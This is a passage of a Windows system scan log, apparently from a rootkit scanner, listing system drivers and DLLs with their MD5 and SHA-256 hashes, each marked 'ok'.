15:33:58.0815 0x04bc  C:\Windows\System32\drivers\csc.sys - ok
15:33:58.0817 0x04bc  [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] C:\Windows\System32\drivers\blbdrive.sys
15:33:58.0817 0x04bc  C:\Windows\System32\drivers\blbdrive.sys - ok
15:33:58.0818 0x04bc  [ A61E76AA38582730CEFA51B78B3184B2, 1E7B401E9765C18CA17F26D796CC77601FC06220C4B88FE5727215B0446BE8BB ] C:\Windows\System32\drivers\dfsc.sys
15:33:58.0818 0x04bc  C:\Windows\System32\drivers\dfsc.sys - ok
15:33:58.0820 0x04bc  [ B20C7345F7EAD6C5E3EFA52E044411B6, 63DC57908D77B77907A278AD219240AEDD502272D5D3D35D5339172CDE36DA86 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys
15:33:58.0820 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys - ok
15:33:58.0822 0x04bc  [ 83E0C370FF5EA3D863A0228A0FE77D59, F7250A4C000F610048C9A96DF669BA8E4B13B088CAE5AC275311CB368071F479 ] C:\Windows\System32\drivers\atikmpag.sys
15:33:58.0822 0x04bc  C:\Windows\System32\drivers\atikmpag.sys - ok
15:33:58.0824 0x04bc  [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] C:\Windows\System32\drivers\tunnel.sys
15:33:58.0824 0x04bc  C:\Windows\System32\drivers\tunnel.sys - ok
15:33:58.0826 0x04bc  [ E1BE83E136DB7EA7D340455E43357F7D, 9AC425676B9EFA49A87A0FCFA5BE169F4B5C66DE1610DD0DF5EB392527C6CD0A ] C:\Windows\System32\ntdll.dll
15:33:58.0826 0x04bc  C:\Windows\System32\ntdll.dll - ok
15:33:58.0828 0x04bc  [ 3442A918386D4716D74C661543151746, EAA865E283A8D99B5EEA49E728942A7F214483C6A36C2D63E33F466095729C80 ] C:\Windows\System32\smss.exe
15:33:58.0828 0x04bc  C:\Windows\System32\smss.exe - ok
15:33:58.0830 0x04bc  [ 57067189A0E0FD88BC90B673C1C60759, 669E3D4A69C0835F1F6B669576EA232D50AA07B28AB0B5B3B2B27F64964F73F5 ] C:\Windows\System32\drivers\atikmdag.sys
15:33:58.0830 0x04bc  C:\Windows\System32\drivers\atikmdag.sys - ok
15:33:58.0832 0x04bc  [ 3B536A8BEC3B4F23FFDFD78B11A2AB93, 7BC847CE6C2D29C334F0D1600BBBDE3933FF45F6BEE5186F442E6270A3F9EC4E ] C:\Windows\System32\autochk.exe
15:33:58.0832 0x04bc  C:\Windows\System32\autochk.exe - ok
15:33:58.0834 0x04bc  [ 87CE5C8965E101CCCED1F4675557E868, 077D98F0F130B2FC710208BA34016EF2B2506EE2BD71740B228145E34A3046F1 ] C:\Windows\System32\drivers\dxgkrnl.sys
15:33:58.0834 0x04bc  C:\Windows\System32\drivers\dxgkrnl.sys - ok
15:33:58.0836 0x04bc  [ 1F04CFB79DD5FB7694468CE3FB3DCC31, A40C0BF6D1EC6C4281611A830EA7B22FEF523A3E197E5A8F59332D64E90376B6 ] C:\Windows\System32\drivers\dxgmms1.sys
15:33:58.0836 0x04bc  C:\Windows\System32\drivers\dxgmms1.sys - ok
15:33:58.0837 0x04bc  [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] C:\Windows\System32\drivers\hdaudbus.sys
15:33:58.0837 0x04bc  C:\Windows\System32\drivers\hdaudbus.sys - ok
15:33:58.0839 0x04bc  [ 7971B368F36042A0EC31FEA15945187B, E5EDD32316549644708DFD84ECC899C12C5095A16A607ACE0E23A9F49DCCC0BC ] C:\Windows\System32\drivers\iusb3xhc.sys
15:33:58.0839 0x04bc  C:\Windows\System32\drivers\iusb3xhc.sys - ok
15:33:58.0841 0x04bc  [ FFA06EF43987ED0DD42AD59B260C0C78, 260518D5E077E55E0F2099037DBEFA93016FD4D4655456DDB3147AF9CBE7BF6B ] C:\Windows\System32\drivers\usbd.sys
15:33:58.0841 0x04bc  C:\Windows\System32\drivers\usbd.sys - ok
15:33:58.0843 0x04bc  [ 772A1DEEDFDBC244183B5C805D1B7D85, 7D821B8DF1F174E5414FFDEAB5207DB687740E9842F7203600AEBA086945AFC9 ] C:\Windows\System32\drivers\HECIx64.sys
15:33:58.0843 0x04bc  C:\Windows\System32\drivers\HECIx64.sys - ok
15:33:58.0845 0x04bc  [ 60633132A929C09FE78FAB16541F9E71, C7B60A4AAD8E0D9519D819A417D8A51383BF1DF571E5EF5A98A693DB0A8E0BE7 ] C:\Windows\System32\drivers\e1c62x64.sys
15:33:58.0845 0x04bc  C:\Windows\System32\drivers\e1c62x64.sys - ok
15:33:58.0847 0x04bc  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] C:\Windows\System32\drivers\serenum.sys
15:33:58.0847 0x04bc  C:\Windows\System32\drivers\serenum.sys - ok
15:33:58.0849 0x04bc  [ C06B32165E23A72A898B7A89679AD754, 721405158F6E9F1A7FE7BB33EF642D91332726629D0D3B07DF3CF3152A91C85D ] C:\Windows\System32\oleaut32.dll
15:33:58.0849 0x04bc  C:\Windows\System32\oleaut32.dll - ok
15:33:58.0851 0x04bc  [ 28C0B5024F5C5A438E78B188CFC81B7F, AB81FB63F2908CE316B45609077ACBD85F4B2AAD1606B1E9030F06DB82EDDFAD ] C:\Windows\System32\normaliz.dll
15:33:58.0851 0x04bc  C:\Windows\System32\normaliz.dll - ok
15:33:58.0852 0x04bc  [ 088CF6AFCD5CDD44E40C0ACDE3C1A5E0, AC6AFCAE3A58AAABC972B3D6A1ED383A59910C689F38D9D4A059A0A535BA1039 ] C:\Windows\System32\usp10.dll
15:33:58.0852 0x04bc  C:\Windows\System32\usp10.dll - ok
15:33:58.0854 0x04bc  [ 12FEB33791920678F8433701C822BCFD, 7D1AD944CF0532D5AF951ACCE064EA9288F068964603674854CD7658D2B96039 ] C:\Windows\System32\drivers\usbport.sys
15:33:58.0854 0x04bc  C:\Windows\System32\drivers\usbport.sys - ok
15:33:58.0856 0x04bc  [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] C:\Windows\System32\drivers\usbehci.sys
15:33:58.0856 0x04bc  C:\Windows\System32\drivers\usbehci.sys - ok
15:33:58.0858 0x04bc  [ 949C61BEF8501BD244C50A7F182CEC74, 98971C1E1199EB2352990F07972BFEC6237581D43551D55A418A27DCB7983667 ] C:\Windows\System32\wininet.dll
15:33:58.0858 0x04bc  C:\Windows\System32\wininet.dll - ok
15:33:58.0860 0x04bc  [ F947D57534E01E3CA597BCF2AD8AE65B, 498A87443CE3344F82B19D4903F128337B5B3DA49D3C208F796394DA6B3A8946 ] C:\Windows\System32\rpcrt4.dll
15:33:58.0860 0x04bc  C:\Windows\System32\rpcrt4.dll - ok
15:33:58.0862 0x04bc  [ 9835E63E09F824D22B689D2BB789BAB9, 5BCFFAFB894D69FBCDDB91E64D30A356F4BD57098E8B4C51B98AFAF6581BDB63 ] C:\Windows\System32\comdlg32.dll
15:33:58.0862 0x04bc  C:\Windows\System32\comdlg32.dll - ok
15:33:58.0864 0x04bc  [ B4F29F65AD3114051F01E9403346047F, 7EB58545211C51E95B3F45C47C1F7CCE05B707D168E7C20F46D36E19EE3D8DFC ] C:\Windows\System32\imagehlp.dll
15:33:58.0864 0x04bc  C:\Windows\System32\imagehlp.dll - ok
15:33:58.0865 0x04bc  [ 796B47A4B82EF1C39F13435B88834C48, AFC3E89476BAAD8A71663F0DB8D15E00FF9D131F1306A2F69D728E3AD1184602 ] C:\Windows\System32\lpk.dll
15:33:58.0865 0x04bc  C:\Windows\System32\lpk.dll - ok
15:33:58.0867 0x04bc  [ 044FE45FFD6AD40E3BBBE60B7F41BABE, A1688A5E6E0F7037C850699462C2655006A7D873C97F9AB406C59D81749B6F09 ] C:\Windows\System32\nsi.dll
15:33:58.0867 0x04bc  C:\Windows\System32\nsi.dll - ok
15:33:58.0869 0x04bc  [ 5D8E6C95156ED1F79A63D1EADE6F9ED5, 12130837D7F89A2C7E9D25747A8E5B9001E0A38D545178B49B450C23AE62664A ] C:\Windows\System32\setupapi.dll
15:33:58.0869 0x04bc  C:\Windows\System32\setupapi.dll - ok
15:33:58.0871 0x04bc  [ 4BBFA57F594F7E8A8EDC8F377184C3F0, 9F3AC5DEA5A6250C3DBB97AF79C81C0A48429486521F807355A1D7D3D861B75F ] C:\Windows\System32\ws2_32.dll
15:33:58.0871 0x04bc  C:\Windows\System32\ws2_32.dll - ok
15:33:58.0873 0x04bc  [ C431EAF5CAA1C82CAC2534A2EAB348A3, ADDF850128DC675E67FABA9A3D0D27E684F01F733962CA22927BB94503549E44 ] C:\Windows\System32\msctf.dll
15:33:58.0873 0x04bc  C:\Windows\System32\msctf.dll - ok
15:33:58.0874 0x04bc  [ 25983DE69B57142039AC8D95E71CD9C9, A677DA7EBCBCB6073D27E8A38809F51E971E83ED379BC599AAAD6EF4216348DA ] C:\Windows\System32\clbcatq.dll
15:33:58.0874 0x04bc  C:\Windows\System32\clbcatq.dll - ok
15:33:58.0876 0x04bc  [ C391FC68282A000CDF953F8B6B55D2EF, 1CB0DAB84545D9FDEA5A7865A1E7132CEAC91DECF8B100285B63098D7B09E584 ] C:\Windows\System32\msvcrt.dll
15:33:58.0876 0x04bc  C:\Windows\System32\msvcrt.dll - ok
15:33:58.0878 0x04bc  [ F458934D036BB3F2C754640339384158, 5553DA46C3091308883DDF99B6C2C73C5CC62B7EA7958157E002834F2DFA953D ] C:\Windows\System32\urlmon.dll
15:33:58.0878 0x04bc  C:\Windows\System32\urlmon.dll - ok
15:33:58.0880 0x04bc  [ 56325BB1FF19F2A5AC8713756AC41140, B2124E57783312EE37D2621E689D8FB4C43A04BDBD4F481225C21038605A28CE ] C:\Windows\System32\gdi32.dll
15:33:58.0880 0x04bc  C:\Windows\System32\gdi32.dll - ok
15:33:58.0882 0x04bc  [ EAF32CB8C1F810E4715B4DFBE785C7FF, DB6AD07FDED42433E669508AB73FAFF6DAFF04575D6F1D016FE3EB6ECEC4DD5D ] C:\Windows\System32\shlwapi.dll
15:33:58.0882 0x04bc  C:\Windows\System32\shlwapi.dll - ok
15:33:58.0883 0x04bc  [ 0F7AFBAEDE7ED02339638EB6B8AEB901, CD0C7892A1455AADB75D25DCE11468E69897149C8DE18BCAFEDD269038A17C9C ] C:\Windows\System32\advapi32.dll
15:33:58.0883 0x04bc  C:\Windows\System32\advapi32.dll - ok
15:33:58.0885 0x04bc  [ 1CBC10733B34EB7D4E92E8022B1535BF, D7C34A001FEBF9BFEAB85F262F1C90489A42F58BB203A01B126656266D9093EB ] C:\Windows\System32\iertutil.dll
15:33:58.0885 0x04bc  C:\Windows\System32\iertutil.dll - ok
15:33:58.0887 0x04bc  [ E1CF57AA65DC541113DBD2E273AF114A, 2E8FD642C63C8C17AF4055AB6C21B1988B4FD3A727C001A43015BC2651BF82B5 ] C:\Windows\System32\shell32.dll
15:33:58.0887 0x04bc  C:\Windows\System32\shell32.dll - ok
15:33:58.0889 0x04bc  [ D2A513EE880D71BDE7F0257F38B9D019, 7BDBFEA312061C0498E4C09EF5E4B3AAA23309E7448028F67EAA6F8F7188E871 ] C:\Windows\System32\kernel32.dll
15:33:58.0889 0x04bc  C:\Windows\System32\kernel32.dll - ok
15:33:58.0891 0x04bc  [ 6C60B5ACA7442EFB794082CDACFC001C, FC1D9124856A70FF232EF3057D66BEE803295847624CE23B4D0217F23AF52C75 ] C:\Windows\System32\ole32.dll
15:33:58.0891 0x04bc  C:\Windows\System32\ole32.dll - ok
15:33:58.0893 0x04bc  [ AA2C08CE85653B1A0D2E4AB407FA176C, 83DFD0C119B20AEDB07114C9D1CF9CE2DFA938D0F1070256B0591A9E2C3997FA ] C:\Windows\System32\imm32.dll
15:33:58.0893 0x04bc  C:\Windows\System32\imm32.dll - ok
15:33:58.0894 0x04bc  [ D87E1E59C73C1F98D5DED5B3850C40F5, 536419BFF9F877D4314B5D0C045D9A6E729489C389863FADF07E382050BC84FD ] C:\Windows\System32\psapi.dll
15:33:58.0894 0x04bc  C:\Windows\System32\psapi.dll - ok
15:33:58.0896 0x04bc  [ 83404DCBCE4925B6A5A77C5170F46D86, D669614D0B4461DB244AD99FBE1BA92CEB9B4ED5EC8E987E23764E77D9AC7074 ] C:\Windows\System32\sechost.dll
15:33:58.0896 0x04bc  C:\Windows\System32\sechost.dll - ok
15:33:58.0898 0x04bc  [ 4E4FFB09D895AA000DD56D1404F69A7E, D999E04BB35780088480EAB322176570591A21E311D204BDCAB010A63B34D24C ] C:\Windows\System32\Wldap32.dll
15:33:58.0898 0x04bc  C:\Windows\System32\Wldap32.dll - ok
15:33:58.0900 0x04bc  [ FE70103391A64039A921DBFFF9C7AB1B, F7D219D75037BC98F6C69143B00AB6000A31F8B5E211E0AF514F4F4B681522A0 ] C:\Windows\System32\user32.dll
15:33:58.0900 0x04bc  C:\Windows\System32\user32.dll - ok
15:33:58.0902 0x04bc  [ F7CE0C81C545364020ED8203CF0A633E, 24B47A7492B7048096AF87E26786E8108455ADBD1A374B6A0466DE008505B8A9 ] C:\Windows\System32\difxapi.dll
15:33:58.0902 0x04bc  C:\Windows\System32\difxapi.dll - ok
15:33:58.0904 0x04bc  [ 9094039A00485F71C4DE64BF51F64C46, 4ACFEF4C747ADF806A4FDEDDFD9CC48168DFB05075306C77D3F3927749DD7484 ] C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
15:33:58.0904 0x04bc  C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll - ok
15:33:58.0906 0x04bc  [ 2477A28081BDAEE622CF045ACF8EE124, 00A09CAF9129E84FEEA98FA03CE9012C9F961B64FEE15C4F268822C0F82ACC3C ] C:\Windows\System32\cfgmgr32.dll
15:33:58.0906 0x04bc  C:\Windows\System32\cfgmgr32.dll - ok
15:33:58.0907 0x04bc  [ 7A17485DC7D8A7AC81321A42CD034519, 88D8705FA901793FC8C1CFD0175E49A6502BF0FC94A066BA573D2FD13AA5F04A ] C:\Windows\System32\userenv.dll
15:33:58.0908 0x04bc  C:\Windows\System32\userenv.dll - ok
15:33:58.0909 0x04bc  [ 959041D7014C97133D859B45BCA0FC58, 282D34828DA7404470949483CB9789A8B4861D188093F0FBD07138A37F60B94B ] C:\Windows\System32\wintrust.dll
15:33:58.0909 0x04bc  C:\Windows\System32\wintrust.dll - ok
15:33:58.0911 0x04bc  [ 0E6FBF19D9DFBB77316C23DF91F8A101, 680F88E1BC55EA3342AACE6F2E3511BF877AC8F03276D028FEE84EEFE8B5611A ] C:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll
15:33:58.0911 0x04bc  C:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll - ok
15:33:58.0913 0x04bc  [ 851BB346CD59D9B3BC8854384C7DD5C3, 0CA1BCBDA6CB8CAC1186B3BE13C3937EDF46264FDFFCEBDF94C7EB10DE957DC6 ] C:\Windows\System32\KernelBase.dll
15:33:58.0913 0x04bc  C:\Windows\System32\KernelBase.dll - ok
15:33:58.0915 0x04bc  [ 72723D3E4781BADC62C3180C137E7B23, 0BDA5292928578C5DA79C761E15B8A892B9D4A3DA26D3635E714797C653CF492 ] C:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll
15:33:58.0915 0x04bc  C:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll - ok
15:33:58.0917 0x04bc  [ 9028D1621C43DF8DFBD1C76860412A11, A1D48D9B33180BDE50D2FA9BB07E9520B7B7788C39B3AABB4A06AE4B1AACA755 ] C:\Windows\System32\comctl32.dll
15:33:58.0917 0x04bc  C:\Windows\System32\comctl32.dll - ok
15:33:58.0919 0x04bc  [ 780F6ECC4F55D76C9730E6B6C9B31913, 1AEA642AFA210A672A92AAA49CFDE52D9E48ED41248F7644FAADE760E8A0E72E ] C:\Windows\System32\crypt32.dll
15:33:58.0919 0x04bc  C:\Windows\System32\crypt32.dll - ok
15:33:58.0921 0x04bc  [ F49E92B50CED5C9F1725D3C0329FD933, 6155FA4D8242F07FC578FF746890C2EE19FC3D6A20ED8AE4C6F021DB2DAC184F ] C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
15:33:58.0921 0x04bc  C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll - ok
15:33:58.0923 0x04bc  [ 64A4AB126E24FD3F58EBE64852773DB5, ED425BBC91EB8BEF54C363036A770C551C97EF324F1AE31049CA750D0E2D6776 ] C:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll
15:33:58.0923 0x04bc  C:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll - ok
15:33:58.0925 0x04bc  [ AFC3DB5C6EB8CA8017DDB81D6C0AD02A, 445C2857398252756FD25BB94DAFCCEFF573DE55F1F8BF9094C191F409FE6437 ] C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
15:33:58.0925 0x04bc  C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll - ok
15:33:58.0927 0x04bc  [ 06FEC9E8117103BB1141A560E98077DA, C5E61B11DDBBBBBA3D9488970524F0975EA5FBDF16E2FA31F579F8BFA48353B1 ] C:\Windows\System32\devobj.dll
15:33:58.0927 0x04bc  C:\Windows\System32\devobj.dll - ok
15:33:58.0928 0x04bc  [ 884415BD4269C02EAF8E2613BF85500D, EFE771709EC942694FD206AC8D0A48ED7DCD35036F074268E4AECD68AC982CEA ] C:\Windows\System32\msasn1.dll
15:33:58.0928 0x04bc  C:\Windows\System32\msasn1.dll - ok
15:33:58.0930 0x04bc  [ 2C942733A5983DD4502219FF37C7EBC7, 34B20B6B0D7274E4B5B783F1D2345BC3DD9888964D5C2C65712F041A00CF5B45 ] C:\Windows\System32\profapi.dll
15:33:58.0930 0x04bc  C:\Windows\System32\profapi.dll - ok
15:33:58.0932 0x04bc  [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] C:\Windows\System32\drivers\GEARAspiWDM.sys
15:33:58.0932 0x04bc  C:\Windows\System32\drivers\GEARAspiWDM.sys - ok
15:33:58.0934 0x04bc  [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] C:\Windows\System32\drivers\intelppm.sys
15:33:58.0934 0x04bc  C:\Windows\System32\drivers\intelppm.sys - ok
15:33:58.0936 0x04bc  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] C:\Windows\System32\drivers\agilevpn.sys
15:33:58.0936 0x04bc  C:\Windows\System32\drivers\agilevpn.sys - ok
15:33:58.0938 0x04bc  [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] C:\Windows\System32\drivers\CompositeBus.sys
15:33:58.0938 0x04bc  C:\Windows\System32\drivers\CompositeBus.sys - ok
15:33:58.0940 0x04bc  [ DBCC20C02E8A3E43B03C304A4E40A84F, BF5F3ACCB0342304A6870E94D2576644B08DBF307C853C7DBA4B82B0C7309DA4 ] C:\Windows\System32\drivers\tpm.sys
15:33:58.0940 0x04bc  C:\Windows\System32\drivers\tpm.sys - ok
15:33:58.0941 0x04bc  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] C:\Windows\System32\drivers\ndistapi.sys
15:33:58.0941 0x04bc  C:\Windows\System32\drivers\ndistapi.sys - ok
15:33:58.0943 0x04bc  [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] C:\Windows\System32\drivers\ndiswan.sys
15:33:58.0943 0x04bc  C:\Windows\System32\drivers\ndiswan.sys - ok
15:33:58.0945 0x04bc  [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] C:\Windows\System32\drivers\rasl2tp.sys
15:33:58.0945 0x04bc  C:\Windows\System32\drivers\rasl2tp.sys - ok
15:33:58.0947 0x04bc  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] C:\Windows\System32\drivers\kbdclass.sys
15:33:58.0947 0x04bc  C:\Windows\System32\drivers\kbdclass.sys - ok
15:33:58.0949 0x04bc  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] C:\Windows\System32\drivers\raspppoe.sys
15:33:58.0949 0x04bc  C:\Windows\System32\drivers\raspppoe.sys - ok
15:33:58.0951 0x04bc  [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] C:\Windows\System32\drivers\raspptp.sys
15:33:58.0951 0x04bc  C:\Windows\System32\drivers\raspptp.sys - ok
15:33:58.0953 0x04bc  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] C:\Windows\System32\drivers\rassstp.sys
15:33:58.0953 0x04bc  C:\Windows\System32\drivers\rassstp.sys - ok
15:33:58.0955 0x04bc  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] C:\Windows\System32\drivers\rdpbus.sys
15:33:58.0955 0x04bc  C:\Windows\System32\drivers\rdpbus.sys - ok
15:33:58.0956 0x04bc  [ 24FBF5CC5C04150073C315A7C83521EE, 581BD5F15B5E57B3BAA762E421FFD859FDA46DDB8515C2A7AAFF208D784E906C ] C:\Windows\System32\drivers\ks.sys
15:33:58.0956 0x04bc  C:\Windows\System32\drivers\ks.sys - ok
15:33:58.0958 0x04bc  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] C:\Windows\System32\drivers\mouclass.sys
15:33:58.0958 0x04bc  C:\Windows\System32\drivers\mouclass.sys - ok
15:33:58.0959 0x04bc  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] C:\Windows\System32\drivers\swenum.sys
15:33:58.0959 0x04bc  C:\Windows\System32\drivers\swenum.sys - ok
15:33:58.0961 0x04bc  [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] C:\Windows\System32\drivers\umbus.sys
15:33:58.0961 0x04bc  C:\Windows\System32\drivers\umbus.sys - ok
15:33:58.0963 0x04bc  [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] C:\Windows\System32\drivers\usbhub.sys
15:33:58.0963 0x04bc  C:\Windows\System32\drivers\usbhub.sys - ok
15:33:58.0965 0x04bc  [ 9C278785347BCC991F8EA2999D90F58D, EA680C3642A6ABF627415AEE019956FAC702DC6A8F4B4D0FC8A4FB21EADD3896 ] C:\Windows\SysWOW64\normaliz.dll
15:33:58.0965 0x04bc  C:\Windows\SysWOW64\normaliz.dll - ok
15:33:58.0967 0x04bc  [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] C:\Windows\System32\drivers\ndproxy.sys
15:33:58.0967 0x04bc  C:\Windows\System32\drivers\ndproxy.sys - ok
15:33:58.0968 0x04bc  [ E0D3CD5841E5C7BE7B94BA946AF1E498, 4EAE1B226255623DA41A047633994D6902F6D4CA5757BF5D85E227378336227F ] C:\Windows\System32\drivers\drmk.sys
15:33:58.0969 0x04bc  C:\Windows\System32\drivers\drmk.sys - ok
15:33:58.0970 0x04bc  [ 2B3B05C0A7768BF033217EB8F33F9C35, F7B13158440CAE46EC93F29BA47A960194A5A2AD71B5BF628AF4661CEE096402 ] C:\Windows\System32\drivers\AtihdW76.sys
15:33:58.0970 0x04bc  C:\Windows\System32\drivers\AtihdW76.sys - ok
15:33:58.0972 0x04bc  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] C:\Windows\System32\drivers\ksthunk.sys
15:33:58.0972 0x04bc  C:\Windows\System32\drivers\ksthunk.sys - ok
15:33:58.0974 0x04bc  [ 1E0B4CBBA91C6B041A14ECC2186F7E24, 63039A317F906454A0652704DA2D646658A148B9B55BFB5D2F4B27997F357DF9 ] C:\Windows\System32\drivers\portcls.sys
15:33:58.0974 0x04bc  C:\Windows\System32\drivers\portcls.sys - ok
15:33:58.0975 0x04bc  [ BB47E889BA2ADB7D1A438F9824F5899B, CE074B540154501C2B77A11BD27996D652BA3C81B7CBD2E8DF2E57B3DF770517 ] C:\Windows\System32\drivers\iusb3hub.sys
15:33:58.0975 0x04bc  C:\Windows\System32\drivers\iusb3hub.sys - ok
15:33:58.0977 0x04bc  [ 392FC7BC8144D0072335AF1F69BDCE9D, 614D3523B24F2963718D196222099E6BD25338D8F126CA5F5D7A1D593F5510AA ] C:\Windows\System32\drivers\RTDVHD64.sys
15:33:58.0977 0x04bc  C:\Windows\System32\drivers\RTDVHD64.sys - ok
15:33:58.0979 0x04bc  [ BF24D6F2ED97FE830BFD52B246F98E67, 6BBF4C4221A245462EF653798F6B416EEB12594AD1CB4E8BC8908A8CB2F53384 ] C:\Windows\System32\drivers\dxapi.sys
15:33:58.0979 0x04bc  C:\Windows\System32\drivers\dxapi.sys - ok
15:33:58.0981 0x04bc  [ 9F50153566DC197792E54925DB37BDAB, 1513A707CD5A0FC9AD4AE509FFE1C42D4BE61EFFE9DAE0AEEB868FF3292E1D2C ] C:\Windows\System32\win32k.sys
15:33:58.0981 0x04bc  C:\Windows\System32\win32k.sys - ok
15:33:58.0983 0x04bc  [ 60C2862B4BF0FD9F582EF344C2B1EC72, CB1C6018FC5C15483AC5BB96E5C2E2E115BB0C0E1314837D77201BAB37E8C03A ] C:\Windows\System32\csrss.exe
15:33:58.0983 0x04bc  C:\Windows\System32\csrss.exe - ok
15:33:58.0984 0x04bc  [ D5E8A3E7A0BB64157AD41F94F57F2DC2, 30634CEC5B8C86099A6430B8C7EBC53D97EA2AEF4B72636B238A031522AE05B9 ] C:\Windows\System32\csrsrv.dll
15:33:58.0984 0x04bc  C:\Windows\System32\csrsrv.dll - ok
15:33:58.0987 0x04bc  [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\System32\basesrv.dll
15:33:58.0987 0x04bc  C:\Windows\System32\basesrv.dll - ok
15:33:58.0989 0x04bc  [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\System32\winsrv.dll
15:33:58.0989 0x04bc  C:\Windows\System32\winsrv.dll - ok
15:33:58.0991 0x04bc  [ 100A1815F5282CFFB99DD77F8BEE8742, B0C70FD7EA1538FF134D070DCC242BA6E5F428CBBF601801E340C29CDED1B504 ] C:\Windows\System32\drivers\hidparse.sys
15:33:58.0991 0x04bc  C:\Windows\System32\drivers\hidparse.sys - ok
15:33:58.0993 0x04bc  [ A68903C267BF0AC5775FE756A9283B1D, B9F97382C88890318C19AB8CE102987147CB8A51529D925EA9B9F86AA5143BAD ] C:\Windows\System32\drivers\hidclass.sys
15:33:58.0993 0x04bc  C:\Windows\System32\drivers\hidclass.sys - ok
15:33:58.0995 0x04bc  [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] C:\Windows\System32\drivers\hidusb.sys
15:33:58.0995 0x04bc  C:\Windows\System32\drivers\hidusb.sys - ok
15:33:58.0997 0x04bc  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] C:\Windows\System32\drivers\mouhid.sys
15:33:58.0997 0x04bc  C:\Windows\System32\drivers\mouhid.sys - ok
15:33:58.0998 0x04bc  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] C:\Windows\System32\drivers\monitor.sys
15:33:58.0998 0x04bc  C:\Windows\System32\drivers\monitor.sys - ok
15:33:59.0000 0x04bc  [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] C:\Windows\System32\drivers\kbdhid.sys
15:33:59.0000 0x04bc  C:\Windows\System32\drivers\kbdhid.sys - ok
